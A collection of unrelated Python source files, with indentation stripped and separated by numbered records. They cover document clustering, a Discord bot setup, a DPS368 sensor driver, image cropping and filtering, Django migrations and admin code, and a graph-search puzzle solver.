for comment in unit.findall('comment'):
if commentStart == True: #print comment.text
units['comments'][filename].append(comment.text)
else:
commentStart = True
for unitFilename, comments in units['comments'].iteritems():
logging.debug( unitFilename)
logging.debug( '\t' + str(comments))
return units
@timed
def calc_sim_mine(zone, tfidfDocsFull, doc1Index, doc2Index):
doc1Full = tfidfDocsFull[zone][doc1Index]
doc2Full = tfidfDocsFull[zone][doc2Index] #print 'doc1Full', doc1Full
#print 'doc1np', doc1Full
# compute cosine similarity using my implementation
cossimval = cos_sim(doc1Full, doc2Full)
return cossimval
def calc_sim_scipy(zone, tfidfDocsNp, doc1Index, doc2Index):
doc1np = tfidfDocsNp[zone][doc1Index]
doc2np = tfidfDocsNp[zone][doc2Index] #print 'doc2Full', doc2Full
#print 'doc2np', doc2Full
# compute cosine similarity using scipy
cossimval = 1-scipy.spatial.distance.cosine(doc1np, doc2np)
return cossimval
@timed
def fast_compute_sim(zones, tfidfs, numDocs, numTokens, weights, filenames):
assert len(weights) == len(zones)
# initialize sim matrix for each zone
sim = {}
for zone in zones:
sim[zone] = [ [0 for i in range(numDocs)] for j in range(numDocs) ]
print sim[zone]
# check lengths of one sim matrix
assert len(sim[zones[0]]) == numDocs
assert len(sim[zones[0]][0]) == numDocs
# initialize combined sim matrix
simCombined = [[0 for i in range(numDocs)] for j in range(numDocs)]
# store each documents tfidf values
tfidfDocs = {}
for zone in zones:
tfidfDocs[zone] = []
for doc in tfidfs[zone]:
tfidfDocs[zone].append(doc)
tfidfDocsFull = {}
for zone in zones:
tfidfDocsFull[zone] = [ conv_sparse_doc_to_full_doc(numTokens,tfidfDocs[zone][i]) for i in xrange(numDocs) ]
tfidfDocsNp = {}
for zone in zones:
tfidfDocsNp[zone] = np.array(tfidfDocsFull[zone])#[ np.asarray(tfidfDocsFull[zone][i]) for i in xrange(numDocs) ]
# compute sim matrix for each zone
for zone in zones:
for doc1Index in xrange(0, numDocs, 1):
for doc2Index in xrange(doc1Index, numDocs, 1):
if doc1Index % 10 == 0:
print 'current sim indices being calculated: {0},{1},{2}'.format(zone,doc1Index,doc2Index)
#doc1 = tfidfDocs[zone][doc1Index]
#doc2 = tfidfDocs[zone][doc2Index]
#cossimval = calc_sim_mine(zone, tfidfDocsFull, doc1Index, doc2Index)
cossimval = calc_sim_scipy(zone, tfidfDocsNp, doc1Index, doc2Index)
sim[zone][doc1Index][doc2Index] = 0 if math.isnan(cossimval) else cossimval
sim[zone][doc2Index][doc1Index] = sim[zone][doc1Index][doc2Index]
# print sim matrix for each zone
for zone in zones:
print 'sim[' + zone + ']'
for row in sim[zone]:
print row
# print sim matrix for each zone with zone name and filename
for zone in zones:
for i in range(numDocs):
for j in range(numDocs):
if not sim[zone][i][j] == 0:
print zone, filenames[i], filenames[j], sim[zone][i][j]
# check symmetry for sim matrices
for zone in zones:
for i in xrange(0,numDocs,1):
for j in xrange(i,numDocs,1):
#print '({0},{1})'.format(i,j),
assert sim[zone][i][j] == sim[zone][j][i]
#print ''36
# create combined sim matrix
for zoneIndex, zone in enumerate(zones):
for i in range(0, numDocs, 1):
for j in range(0, numDocs, 1):
if i == j:
print 'weights[zoneIndex]', weights[zoneIndex]
print 'sim[zone][i][j]', sim[zone][i][j]
simCombined[i][j] += weights[zoneIndex]*sim[zone][i][j]
return simCombined
def gaac_sim(cluster1, cluster2, sim):
sumCosSim = 0
for i in cluster1:
for j in cluster2:
sumCosSim += sim[i][j]
if sumCosSim == 0:
return 0
denom = (len(cluster1)+len(cluster2))*(len(cluster1)+len(cluster2)-1)
return sumCosSim/denom
@timed
def createobs(sysname, zones, docs, filenames, numDocs, giantDict, numTokens):
obs = []
# initialize obs
for numDoc in range(numDocs):
obs.append([0 for numToken in range(len(zones) * numTokens)])
mycorpora = {}
tfidfs = {}
id2token = {}
for zoneIndex, zone in enumerate(zones):
id2token[zone] = {}
for token, id in giantDict.token2id.iteritems():
id2token[zone][id] = token
mycorpora[zone] = [giantDict.doc2bow(doc) for doc in docs[zone]]
corpora.MmCorpus.serialize('/tmp/' + sysname + '_' + zone + '.mm', mycorpora[zone]) # store to disk, for later use
print mycorpora[zone]
tfidfModel = models.TfidfModel(mycorpora[zone]) # step 1 -- initialize a model
tfidfs[zone] = tfidfModel[mycorpora[zone]]
print ''
print 'Analyzing zone ' + zone
for index, doc in enumerate(tfidfs[zone]):
print filenames[index], doc
print ''
print 'Total number of tokens for zone ' + zone + ': ' + str(len(id2token[zone].keys()))
#obs.append( [0 for key in range(len(id2token[zone].keys())) ] )
print ''
print 'Printing tokens with ids and tfidfModel values for zone ' + zone + ':'
for index, doc in enumerate(tfidfs[zone]):
for id, value in doc:
print filenames[index] + ' ' + id2token[zone][id] + ' ' + str(id) + "," + str(value)
#obs[index].append(value)
for zoneIndex, zone in enumerate(zones):
for tfidfIndex, doc in enumerate(tfidfs[zone]):
for id, value in doc:
colIndex = zoneIndex * numTokens + id
obs[tfidfIndex][colIndex] = value
for row in obs:
print len(row), ' - ', row
numZeros = []
for row in obs:
numZeros.append([val for val in row if val == 0])
print ''
print 'Number of zeros in rows:'
for row in numZeros:
print len(row)
#for zoneIndex,obsRow in enumerate(obs):
# for termIndex,obsCol in enumerate(obsRow):
# print zones[zoneIndex] + ':' + id2token[zones[zoneIndex]][termIndex] + ':' + str(termIndex) + ':' + str(obs[zoneIndex][termIndex]),
return obs, tfidfs, id2token
@timed
def calcweights(zones, filenames, initialWeights, obs, tfidfs, id2token):
g = mixture.GMM(n_components=len(zones),n_iter=500)
print 'original initial weights', g.weights_
#g.fit(obs)
#print 'weights', g.weights_
#print 'means', g.means_
#print 'covars', g.covars_
#g = mixture.GMM(n_components=len(zones))
g.weights_ = initialWeights
print 'zone-tokens-based initial weights', g.weights_
g.fit(obs)
print 'weights', g.weights_
print 'means', g.means_
print 'covars', g.covars_
print ''
for zoneIndex, zone in enumerate(zones):
for docIndex, doc in enumerate(tfidfs[zone]):
print zone, filenames[docIndex]
print [id2token[zone][id] + ' ' + str(id) + "," + str(value) for id, value in doc]
return g.weights_
def max_indices(mat):
maxIdxForEachRow = mat.argmax(0)
maxValsForEachCol = np.array([mat[rowPos][colPos] for colPos,rowPos in enumerate(maxIdxForEachRow)])
maxPosCol = maxValsForEachCol.argmax()
maxPosRow = maxIdxForEachRow[maxPosCol]
maxVal = mat[maxPosRow][maxPosCol]
return maxVal,maxPosRow,maxPosCol
@timed
def most_sim_clusterpair(sim, clusters):
maxSimVal = -1
for i in xrange(0, len(clusters), 1):
for j in range(i, len(clusters), 1):
if i != j:
if sim[i][j] > maxSimVal:
maxSimVal = sim[i][j]
maxi = i
maxj = j
return maxSimVal, maxi, maxj
def del_old_vals(sim, clusters, maxi, maxj):
greaterIndex = maxi
lesserIndex = maxj
if maxj > maxi:
greaterIndex = maxj
lesserIndex = maxi
#del sim[greaterIndex]
sim = np.delete(sim,greaterIndex,axis=0)
#for row in sim:
#del row[greaterIndex]
sim = np.delete(sim,greaterIndex,axis=1)
#del sim[lesserIndex]
sim = np.delete(sim,lesserIndex,axis=0)
#for row in sim:
# del row[lesserIndex]
sim = np.delete(sim,lesserIndex,axis=1)
del clusters[greaterIndex]
del clusters[lesserIndex]
return sim
def check_sim_dims(sim, clusters):
assert len(sim) == len(clusters)
for rowIndex, row in enumerate(sim):
assert len(row) == len(clusters)
def add_new_simrows(sim, clusters, newRow):
for rowIndex, row in enumerate(sim):
if rowIndex != len(clusters) - 1:
row.append(newRow[rowIndex])
def runclustering(filenames, numDocs, sim):
print 'python sim:'
print sim[0]
sim = np.array(sim)
origSim = np.array(sim)
for i in xrange(numDocs):
sim[i][i] = 0
print 'numpy sim:'
print sim[0]
clusters = []
for i in range(numDocs):
cluster = set()
cluster.add(i)
clusters.append(cluster)
cutoff = int(len(clusters) * 0.1)
while len(clusters) != cutoff:
maxi = -1
maxj = -1
#maxSimVal, maxi, maxj = most_sim_clusterpair(sim, clusters)
maxSimVal, maxi, maxj = max_indices(sim)
notallzeros = 'maxi == maxj and sim matrix is not all zeros'
if maxi == maxj:
for i in xrange(len(sim)):
for j in xrange(i,len(sim),1):
assert sim[i][j] == 0, notallzeros
assert sim[j][i] == 0, notallzeros
assert maxSimVal != -1
assert maxi != -1
assert maxj != -1
print 'max sim val: {0}'.format(maxSimVal)
print 'max i ({0}): {1}'.format(maxi, [filenames[i] for i in clusters[maxi]])
print 'max j ({0}): {1}'.format(maxj, [filenames[i] for i in clusters[maxj]])
newCluster = clusters[maxi] | clusters[maxj]
sim = del_old_vals(sim, clusters, maxi, maxj)
clusters.append(newCluster)
newRow = [gaac_sim(newCluster, cluster, origSim) for cluster in clusters]
expsim = np.zeros((len(sim)+1,len(sim)+1))
expsim[:len(sim),:len(sim)] = sim
sim = expsim
for pos, val in enumerate(newRow):
sim[-1][pos] = val
sim[pos][-1] = val
sim[-1][-1] = 0
#add_new_simrows(sim, clusters, newRow)
print ''
print newRow
#sim.append(newRow)
print sim
check_sim_dims(sim, clusters)
return clusters
@timed
def writeclustersfile(args, sysname, filenames, clusters):
datadir = 'data'
if not os.path.exists(datadir):
os.makedirs(datadir)
if args['weights'] == 'uni':
outputClustersRsfFilename = datadir + '/' + sysname + '_zclusters_uniweights.rsf'
elif args['weights'] == 'em':
outputClustersRsfFilename = datadir + '/' + sysname + '_zclusters_emweights.rsf'
else:
raise Exception('invalid weights selected')
out = open(outputClustersRsfFilename, 'w')
for clusterIndex, cluster in enumerate(clusters):
for filenameIndex in cluster:
entityName = None
if args['lang'] == 'java':
entityName = string.replace(string.replace(filenames[filenameIndex], '/', '.'), '.java', '')
elif args['lang'] == 'c':
entityName = filenames[filenameIndex]
else:
raise Exception('Invalid language')
rsfLine = 'contain {0} {1}'.format(clusterIndex, entityName)
print rsfLine
out.write(rsfLine + '\n')
out.close()
def interact():
import code
code.InteractiveConsole(locals=globals()).interact()
@timed
def exec_first_phase(args,sysname,tree):
zones = None
units = None
if args['lang'] == 'java':
zones = ['class', 'fields', 'func_names', 'params', 'func_blocks', 'comments']
units = extract_java_toks(tree, zones)
elif args['lang'] == 'c':
zones = ['modvars', 'func_names', 'params', 'func_blocks', 'comments']
units = extract_c_toks(tree, zones)
'''
hp = hpy()
hp.setrelheap()
h = hp.heap()
'''
docs = {}
filenames = []
docsAllZones = []
for zone in zones:
print
print 'creating bow for ' + zone
docs[zone], filenames = createbow(args, units[zone])
for doc in docs[zone]:
docsAllZones.append(doc)
#import pdb; pdb.set_trace()
numTokensInZone = {}
for zone in zones:
numTokensInZone[zone] = 0
for zone in zones:
for doc in docs[zone]:
logging.debug(zone, doc)
for word in doc:
numTokensInZone[zone] += 1
totalTokensAcrossAllZones = 0
for zone in zones:
totalTokensAcrossAllZones += numTokensInZone[zone]
print ''
for zone in zones:
print 'number of tokens in zone', zone, numTokensInZone[zone]
print 'number of tokens across all zones', totalTokensAcrossAllZones
tokenBasedWeights = []
for zone in zones:
denom = float(totalTokensAcrossAllZones)
if denom == 0:
denom = .00001
numer = float(numTokensInZone[zone])
tokenBasedWeights.append(numer / denom)
equalWeights = []
for zone in zones:
equalWeights.append(float(1) / float(len(zones)))
print 'initial weights based on tokens in zone:'
print tokenBasedWeights
selectedWeights = []
if args['weights'] == 'uni':
selectedWeights = equalWeights
elif args['weights'] == 'em':
selectedWeights = tokenBasedWeights
else:
raise Exception('invalid weight selection: {0}'.format(args['weights']))
# create one row in obs for each document
numDocs = len([doc for doc in docs[zones[0]]])
assert len(units[zones[0]].keys()) == numDocs
giantDict = corpora.Dictionary(docsAllZones)
giantDict.save('/tmp/' + sysname + '.dict') # store the dictionary, for future reference
print giantDict
numTokens = len(giantDict.token2id.keys())
print 'total number of tokens from giantDict: ', numTokens
obs, tfidfs, id2token = createobs(sysname, zones, docs, filenames, numDocs, giantDict, numTokens)
print 'size of obs: ', sys.getsizeof(obs)
emweights = calcweights(zones, filenames, selectedWeights, obs, tfidfs, id2token)
#compute_sim(zones, tfidfs, numTokens, sim)
simFilename = '/tmp/' + sysname + '_sim.pkl'
sim = None
simFile = None
usingSavedSim = False
sim = fast_compute_sim(zones, tfidfs, numDocs, numTokens, emweights, filenames)
simFile = open(simFilename, 'w')
pickle.dump(sim, simFile)
# if os.path.isfile(simFilename) and usingSavedSim:
# simFile = open(simFilename,'r')
# sim = pickle.load(simFile)
# else:
# sim = fast_compute_sim(zones, tfidfs, numDocs, numTokens, selectedWeights, filenames)
# simFile = open(simFilename,'w')
# pickle.dump(sim,simFile)
# simFile.close()
print ''
print 'Doc sim matrix:'
for row in sim:
print row
return filenames, numDocs, sim
def main():
'''query = 'comment'
for elem in tree.iter(tag='comment'):
print elem.tag, elem.text
exit()'''
args, sysname, tree = setup()
filenames, numDocs, sim = exec_first_phase(args,sysname,tree)
clusters = runclustering(filenames, numDocs, sim)
writeclustersfile(args, sysname, filenames, clusters)
if __name__ == '__main__':
cProfile.run('main()','main.prof')
|
995,091 | e0fc1a9202f8491f59ee7c065f6eb0c5407eb81e | from discord import Client
import aioredis
from logging import getLogger
from elastic_helper import ElasticSearchClient
from sql_helper import SQLConnection
from sql_helper.metrics import sql_wrapper
from nqn_common import dpy, GlobalContext
from rabbit_parsers import DemoBaseRabbit
log = getLogger(__name__)
async def initialise(config, postgres_pool):
elastic = ElasticSearchClient(config["elastic"]["hosts"])
bot = Client()
log.info("Connecting to Redis")
persistent_redis = await aioredis.create_redis_pool(config["persistent_redis_uri"], encoding="utf-8")
nonpersistent_redis = await aioredis.create_redis_pool(config["nonpersistent_redis_uri"], encoding="utf-8")
log.info("Connecting to PostgreSQL")
postgres: SQLConnection = SQLConnection(
postgres_pool,
bot.get_guild,
sql_wrapper("commands")
)
await dpy.connect(
bot,
nonpersistent_redis,
config["discord"]["proxy"],
config["discord"]["token"]
)
log.info("Connecting to RabbitMQ")
guild_cache = dpy.GuildCache(bot, nonpersistent_redis)
rabbit = DemoBaseRabbit(bot, guild_cache, config["rabbit_uri"])
log.info("Initialising global context")
bot.global_ctx = GlobalContext.from_databases(
owner=bot.owner,
bot_user=bot.user,
postgres=postgres,
elastic=elastic,
persistent_redis=persistent_redis,
nonpersistent_redis=nonpersistent_redis,
get_guild=bot.get_guild,
get_emoji=bot.get_emoji,
emote_hasher_url=config["hasher_url"],
webhook_url=config["webhook_url"],
user_emote_cache_time=config.get("user_emote_cache_time", 10),
broadcast_prefix=rabbit.send_prefix
)
log.info("Bot initialised, connecting to Discord")
await guild_cache.load_state_from_redis()
await bot.global_ctx.aliases.update_alias_servers()
async def cleanup():
pass
dpy.take_over_the_world(
rabbit=rabbit,
redis=nonpersistent_redis,
process_name="demo_base_bot",
world_takeover_sleep=config.get("world_takeover_sleep", 5),
cleanup=cleanup()
)
log.info("Finished initialising")
|
995,092 | faf8ad0bdf36a0359115dfe26b3e91fec301cdab | import time
import board
def getTwosComplement(raw_val, length):
"""Get two's complement of `raw_val`.
Args:
raw_val (int): Raw value
length (int): Max bit length
Returns:
int: Two's complement
"""
val = raw_val
if raw_val & (1 << (length - 1)):
val = raw_val - (1 << length)
return val
class DPS368:
bus = board.I2C()
address = 0x76
kP = 1040384
kT = 1040384
def __init__(self, address=0x76):
self.address = address
self.__correctTemperature()
self.__setOversamplingRate()
def write_byte_data(self, addr, register, data):
payload = bytearray([register])
if (data):
payload = bytearray([register, data])
self.bus.writeto(addr, payload)
def read_byte_data(self, addr, registry):
registry = bytearray([registry])
result = bytearray(1)
self.bus.writeto_then_readfrom(addr, registry, result)
return result[0]
def __correctTemperature(self):
"""Correct temperature.
DPS sometimes indicates a temperature over 60 degree Celsius
although room temperature is around 20-30 degree Celsius.
Call this function to fix.
"""
# Correct Temp
self.write_byte_data(self.address, 0x0E, 0xA5)
self.write_byte_data(self.address, 0x0F, 0x96)
self.write_byte_data(self.address, 0x62, 0x02)
self.write_byte_data(self.address, 0x0E, 0x00)
self.write_byte_data(self.address, 0x0F, 0x00)
def __setOversamplingRate(self):
"""Set oversampling rate.
Pressure measurement rate : 4 Hz
Pressure oversampling rate : 64 times
Temperature measurement rate : 4 Hz
Temperature oversampling rate: 64 times
"""
# Oversampling Rate Setting (64time)
self.write_byte_data(self.address, 0x06, 0x26)
self.write_byte_data(self.address, 0x07, 0xA6)
self.write_byte_data(self.address, 0x08, 0x07)
# Oversampling Rate Configuration
self.write_byte_data(self.address, 0x09, 0x0C)
def __getRawPressure(self):
"""Get raw pressure from sensor.
Returns:
int: Raw pressure
"""
p1 = self.read_byte_data(self.address, 0x00)
p2 = self.read_byte_data(self.address, 0x01)
p3 = self.read_byte_data(self.address, 0x02)
p = (p1 << 16) | (p2 << 8) | p3
p = getTwosComplement(p, 24)
return p
def __getRawTemperature(self):
"""Get raw temperature from sensor.
Returns:
int: Raw temperature
"""
t1 = self.read_byte_data(self.address, 0x03)
t2 = self.read_byte_data(self.address, 0x04)
t3 = self.read_byte_data(self.address, 0x05)
t = (t1 << 16) | (t2 << 8) | t3
t = getTwosComplement(t, 24)
return t
def __getPressureCalibrationCoefficients(self):
"""Get pressure calibration coefficients from sensor.
Returns:
int: Pressure calibration coefficient (c00)
int: Pressure calibration coefficient (c10)
int: Pressure calibration coefficient (c20)
int: Pressure calibration coefficient (c30)
int: Pressure calibration coefficient (c01)
int: Pressure calibration coefficient (c11)
int: Pressure calibration coefficient (c21)
"""
src13 = self.read_byte_data(self.address, 0x13)
src14 = self.read_byte_data(self.address, 0x14)
src15 = self.read_byte_data(self.address, 0x15)
src16 = self.read_byte_data(self.address, 0x16)
src17 = self.read_byte_data(self.address, 0x17)
src18 = self.read_byte_data(self.address, 0x18)
src19 = self.read_byte_data(self.address, 0x19)
src1A = self.read_byte_data(self.address, 0x1A)
src1B = self.read_byte_data(self.address, 0x1B)
src1C = self.read_byte_data(self.address, 0x1C)
src1D = self.read_byte_data(self.address, 0x1D)
src1E = self.read_byte_data(self.address, 0x1E)
src1F = self.read_byte_data(self.address, 0x1F)
src20 = self.read_byte_data(self.address, 0x20)
src21 = self.read_byte_data(self.address, 0x21)
c00 = (src13 << 12) | (src14 << 4) | (src15 >> 4)
c00 = getTwosComplement(c00, 20)
c10 = ((src15 & 0x0F) << 16) | (src16 << 8) | src17
c10 = getTwosComplement(c10, 20)
c20 = (src1C << 8) | src1D
c20 = getTwosComplement(c20, 16)
c30 = (src20 << 8) | src21
c30 = getTwosComplement(c30, 16)
c01 = (src18 << 8) | src19
c01 = getTwosComplement(c01, 16)
c11 = (src1A << 8) | src1B
c11 = getTwosComplement(c11, 16)
c21 = (src1E < 8) | src1F
c21 = getTwosComplement(c21, 16)
return c00, c10, c20, c30, c01, c11, c21
def __getTemperatureCalibrationCoefficients(self):
"""Get temperature calibration coefficients from sensor.
Returns:
int: Temperature calibration coefficient (c0)
int: Temperature calibration coefficient (c1)
"""
src10 = self.read_byte_data(self.address, 0x10)
src11 = self.read_byte_data(self.address, 0x11)
src12 = self.read_byte_data(self.address, 0x12)
c0 = (src10 << 4) | (src11 >> 4)
c0 = getTwosComplement(c0, 12)
c1 = ((src11 & 0x0F) << 8) | src12
c1 = getTwosComplement(c1, 12)
return c0, c1
#############################################################################
def calcScaledPressure(self):
"""Calculate scaled pressure.
Returns:
float: Scaled pressure
"""
raw_p = self.__getRawPressure()
scaled_p = raw_p / self.kP
return scaled_p
def calcScaledTemperature(self):
"""Calculate scaled temperature.
Returns:
float: Scaled temperature
"""
raw_t = self.__getRawTemperature()
scaled_t = raw_t / self.kT
return scaled_t
def calcCompTemperature(self, scaled_t):
"""Calculate compensated temperature.
Args:
scaled_t (float): Scaled temperature
Returns:
float: Compensated temperature [C]
"""
c0, c1 = self.__getTemperatureCalibrationCoefficients()
comp_t = c0 * 0.5 + scaled_t * c1
return comp_t
def calcCompPressure(self, scaled_p, scaled_t):
"""Calculate compensated pressure.
Args:
scaled_p (float): Scaled pressure
scaled_t (float): Scaled temperature
Returns:
float: Compensated pressure [Pa]
"""
c00, c10, c20, c30, c01, c11, c21 = self.__getPressureCalibrationCoefficients()
comp_p = (c00 + scaled_p * (c10 + scaled_p * (c20 + scaled_p * c30))
+ scaled_t * (c01 + scaled_p * (c11 + scaled_p * c21)))
return comp_p
def measureTemperatureOnce(self):
"""Measures compensated temperature once.
Returns:
float:One compensated temperature value [C]
"""
t = self.calcScaledTemperature()
temperature = self.calcCompTemperature(t)
return temperature
def measurePressureOnce(self):
"""Measure compensated pressure once.
Returns:
float:One Compensated pressure value [Pa]
"""
p = self.calcScaledPressure()
t = self.calcScaledTemperature()
pressure = self.calcCompPressure(p, t)
return pressure
def measureBothOnce(self):
""" measures compensated temperature and compensated pressure once
Returns:
float: Compensated Temperature
float: Compensated Pressure
"""
t = self.calcScaledTemperature()
temp = self.calcCompTemperature(t)
p = self.calcScaledPressure()
pressure = self.calcCompPressure(p, t)
return temp, pressure
|
995,093 | 587258852da591df2b147aa341c601527b77878f | import itertools as I
from uuid import uuid4
from dw.db import schema as S
from dw.util import fp
from dw.util.etc_utils import modulo_pad, factorseq
def crop_xys_list(org_ws, org_hs, crop_w, crop_h):
img_wseq = (org_w + modulo_pad(org_w, crop_w) for org_w in org_ws)
img_hseq = (org_h + modulo_pad(org_h, crop_h) for org_h in org_hs)
xseq = (list(factorseq(img_w, crop_w)) for img_w in img_wseq)
yseq = (list(factorseq(img_h, crop_h)) for img_h in img_hseq)
xys_list = fp.lmap(fp.pipe(I.product, list), xseq, yseq)
return xys_list
#---------------------------------------------------------------
def valid(ids, types, origin_ws, origin_hs, crop_w, crop_h):
return True
def load(ids, types, origin_ws, origin_hs, crop_w, crop_h):
'''
ids, origin_whs are about source images.
w, h are target crop size.
'''
return ids, types, origin_ws, origin_hs, crop_w, crop_h
def process(loaded):
ids, types, org_ws,org_hs, w,h = loaded
# Make img_(w,h)s multiply of crop_(w,h)
'''
img_wseq = (org_w + modulo_pad(org_w,w) for org_w in org_ws)
img_hseq = (org_h + modulo_pad(org_h,h) for org_h in org_hs)
xs = [list(factorseq(img_w, w)) for img_w in img_wseq]
ys = [list(factorseq(img_h, h)) for img_h in img_hseq]
xys_list = fp.lmap(fp.pipe(I.product, list), xs, ys)
'''
xys_list = crop_xys_list(org_ws, org_hs, w, h)
org_whs = zip(org_ws, org_hs)
'''
from pprint import pprint
print('---------------------------')
#pprint(xys_list)
pprint(loaded)
#pprint(fp.lmap(list,xyseq))
pprint(xs)
'''
assert len(ids) == len(xys_list)
return ids, types, org_whs, w,h, xys_list
def canonical(processed):
''' origin image => crops '''
org_ids, types, org_whs, w,h, xys_list = processed
# org_ids, types, org_whs are origin image info. same len.
# w, h are all crops size
# xys_list is begin coord(x,y) of crops of images.
# list of list, same len with other lists.
crop_ids_list = fp.lmap(
lambda xys: fp.lrepeatedly(uuid4, len(xys)), xys_list)
zipped = fp.lmapcat(
lambda cids, oid, type, org_wh:
fp.lzip(cids,
fp.repeat(oid),
fp.repeat(type),
fp.repeat(org_wh)),
crop_ids_list, org_ids, types, org_whs)
crop_ids, img_ids, crop_types, full_whs = fp.unzip(zipped)
crop_xys = fp.lcat(xys_list)
return fp.concat(
(S.data(uuid=id, type=type)
for id, type in zip(crop_ids, crop_types)),
[S.COMMIT],
(S.image(uuid=id, x=x,y=y, w=w,h=h, full_w=fw,full_h=fh)
for id, (x,y), (fw,fh) in
zip(crop_ids, crop_xys, full_whs)),
(S.data_relation(aid=iid, bid=cid, type='image_crop')
for iid, cid in zip(img_ids, crop_ids)))
|
995,094 | ae038b7f4bb52a981c2432cfb1615f983ba57cd9 | from PIL import Image,ImageFilter
from matplotlib import pyplot as plt
img = Image.open('image/a0.jpg')
img1 = img.filter(ImageFilter.CONTOUR) #轮廓
img2 = img.filter(ImageFilter.BLUR) #模糊
img3 = img.filter(ImageFilter.BoxBlur(radius=1)) #模糊
img4 = img.filter(ImageFilter.DETAIL) #锐化
img5 = img.filter(ImageFilter.EMBOSS) #浮雕
img6 = img.filter(ImageFilter.EDGE_ENHANCE) #边缘增强
# print(help(ImageFilter.BoxBlur))
# img.show()
fig = plt.figure(figsize=(300,100))
plt.subplot(161)
plt.imshow(img)
plt.subplot(162)
plt.imshow(img1)
plt.subplot(163)
plt.imshow(img2)
plt.subplot(164)
plt.imshow(img3)
plt.subplot(165)
plt.imshow(img4)
plt.subplot(166)
plt.imshow(img5)
plt.show() |
995,095 | d4d6a474f48a6975796267900f148b263684d4fb | # -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-03-20 20:30
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0004_auto_20170319_2143'),
]
operations = [
migrations.RenameField(
model_name='nrcs_locations',
old_name='County',
new_name='county',
),
migrations.RenameField(
model_name='nrcs_locations',
old_name='Elev',
new_name='elev',
),
migrations.RenameField(
model_name='nrcs_locations',
old_name='Hydrologic_Unit',
new_name='hydrologic_unit',
),
migrations.RenameField(
model_name='nrcs_locations',
old_name='Lat',
new_name='lat',
),
migrations.RenameField(
model_name='nrcs_locations',
old_name='Lon',
new_name='lon',
),
migrations.RenameField(
model_name='nrcs_locations',
old_name='Ntwk',
new_name='ntwk',
),
migrations.RenameField(
model_name='nrcs_locations',
old_name='SHEF',
new_name='shef',
),
migrations.RenameField(
model_name='nrcs_locations',
old_name='Site_Name',
new_name='site_name',
),
migrations.RenameField(
model_name='nrcs_locations',
old_name='Station',
new_name='station',
),
migrations.RenameField(
model_name='nrcs_monthlysnow',
old_name='Water_Year',
new_name='water_year',
),
migrations.RemoveField(
model_name='nrcs_monthlysnow',
name='Apr_collection_date',
),
migrations.RemoveField(
model_name='nrcs_monthlysnow',
name='Apr_snow_depth',
),
migrations.RemoveField(
model_name='nrcs_monthlysnow',
name='Apr_snow_water_equivalent',
),
migrations.RemoveField(
model_name='nrcs_monthlysnow',
name='Aug_collection_date',
),
migrations.RemoveField(
model_name='nrcs_monthlysnow',
name='Aug_snow_depth',
),
migrations.RemoveField(
model_name='nrcs_monthlysnow',
name='Aug_snow_water_equivalent',
),
migrations.RemoveField(
model_name='nrcs_monthlysnow',
name='Dec_collection_date',
),
migrations.RemoveField(
model_name='nrcs_monthlysnow',
name='Dec_snow_depth',
),
migrations.RemoveField(
model_name='nrcs_monthlysnow',
name='Dec_snow_water_equivalent',
),
migrations.RemoveField(
model_name='nrcs_monthlysnow',
name='Feb_collection_date',
),
migrations.RemoveField(
model_name='nrcs_monthlysnow',
name='Feb_snow_depth',
),
migrations.RemoveField(
model_name='nrcs_monthlysnow',
name='Feb_snow_water_equivalent',
),
migrations.RemoveField(
model_name='nrcs_monthlysnow',
name='Jan_collection_date',
),
migrations.RemoveField(
model_name='nrcs_monthlysnow',
name='Jan_snow_depth',
),
migrations.RemoveField(
model_name='nrcs_monthlysnow',
name='Jan_snow_water_equivalent',
),
migrations.RemoveField(
model_name='nrcs_monthlysnow',
name='Jul_collection_date',
),
migrations.RemoveField(
model_name='nrcs_monthlysnow',
name='Jul_snow_depth',
),
migrations.RemoveField(
model_name='nrcs_monthlysnow',
name='Jul_snow_water_equivalent',
),
migrations.RemoveField(
model_name='nrcs_monthlysnow',
name='Jun_collection_date',
),
migrations.RemoveField(
model_name='nrcs_monthlysnow',
name='Jun_snow_depth',
),
migrations.RemoveField(
model_name='nrcs_monthlysnow',
name='Jun_snow_water_equivalent',
),
migrations.RemoveField(
model_name='nrcs_monthlysnow',
name='Mar_collection_date',
),
migrations.RemoveField(
model_name='nrcs_monthlysnow',
name='Mar_snow_depth',
),
migrations.RemoveField(
model_name='nrcs_monthlysnow',
name='Mar_snow_water_equivalent',
),
migrations.RemoveField(
model_name='nrcs_monthlysnow',
name='May_collection_date',
),
migrations.RemoveField(
model_name='nrcs_monthlysnow',
name='May_snow_depth',
),
migrations.RemoveField(
model_name='nrcs_monthlysnow',
name='May_snow_water_equivalent',
),
migrations.RemoveField(
model_name='nrcs_monthlysnow',
name='Nov_collection_date',
),
migrations.RemoveField(
model_name='nrcs_monthlysnow',
name='Nov_snow_depth',
),
migrations.RemoveField(
model_name='nrcs_monthlysnow',
name='Nov_snow_water_equivalent',
),
migrations.RemoveField(
model_name='nrcs_monthlysnow',
name='Oct_collection_date',
),
migrations.RemoveField(
model_name='nrcs_monthlysnow',
name='Oct_snow_depth',
),
migrations.RemoveField(
model_name='nrcs_monthlysnow',
name='Oct_snow_water_equivalent',
),
migrations.RemoveField(
model_name='nrcs_monthlysnow',
name='Sep_collection_date',
),
migrations.RemoveField(
model_name='nrcs_monthlysnow',
name='Sep_snow_depth',
),
migrations.RemoveField(
model_name='nrcs_monthlysnow',
name='Sep_snow_water_equivalent',
),
migrations.AddField(
model_name='nrcs_monthlysnow',
name='collection_date',
field=models.DateField(null=True),
),
migrations.AddField(
model_name='nrcs_monthlysnow',
name='collection_month',
field=models.PositiveSmallIntegerField(default=1),
preserve_default=False,
),
migrations.AddField(
model_name='nrcs_monthlysnow',
name='snow_depth',
field=models.PositiveSmallIntegerField(null=True),
),
migrations.AddField(
model_name='nrcs_monthlysnow',
name='snow_water_equivalent',
field=models.DecimalField(decimal_places=2, max_digits=5, null=True),
),
]
|
995,096 | 28bebf8e090e9a3438503763eddf2a36c47d7b37 | from django.contrib import admin
from .models import *
admin.site.register(Client)
admin.site.register(ServiceProvider_Motor)
|
995,097 | 1bcc41c5fc94446dbd0e5cc3d19313e298d493b2 | from collections import defaultdict
import time
start_time = time.time()
content = open('i', 'r').readlines()
content = [c.strip() for c in content]
G = defaultdict(list)
count = 0
for row in content:
left, right = row.split('-')
G[left].append(right)
G[right].append(left)
def dfs(node, V, using_twice):
global count
mod_twice = False
if node == 'end':
count+=1
return
if node in V and node.islower():
if node == 'start':
return
elif using_twice:
return
using_twice = True
mod_twice = True
if node.islower():
V.add(node)
for child in G[node]:
dfs(child, V, using_twice)
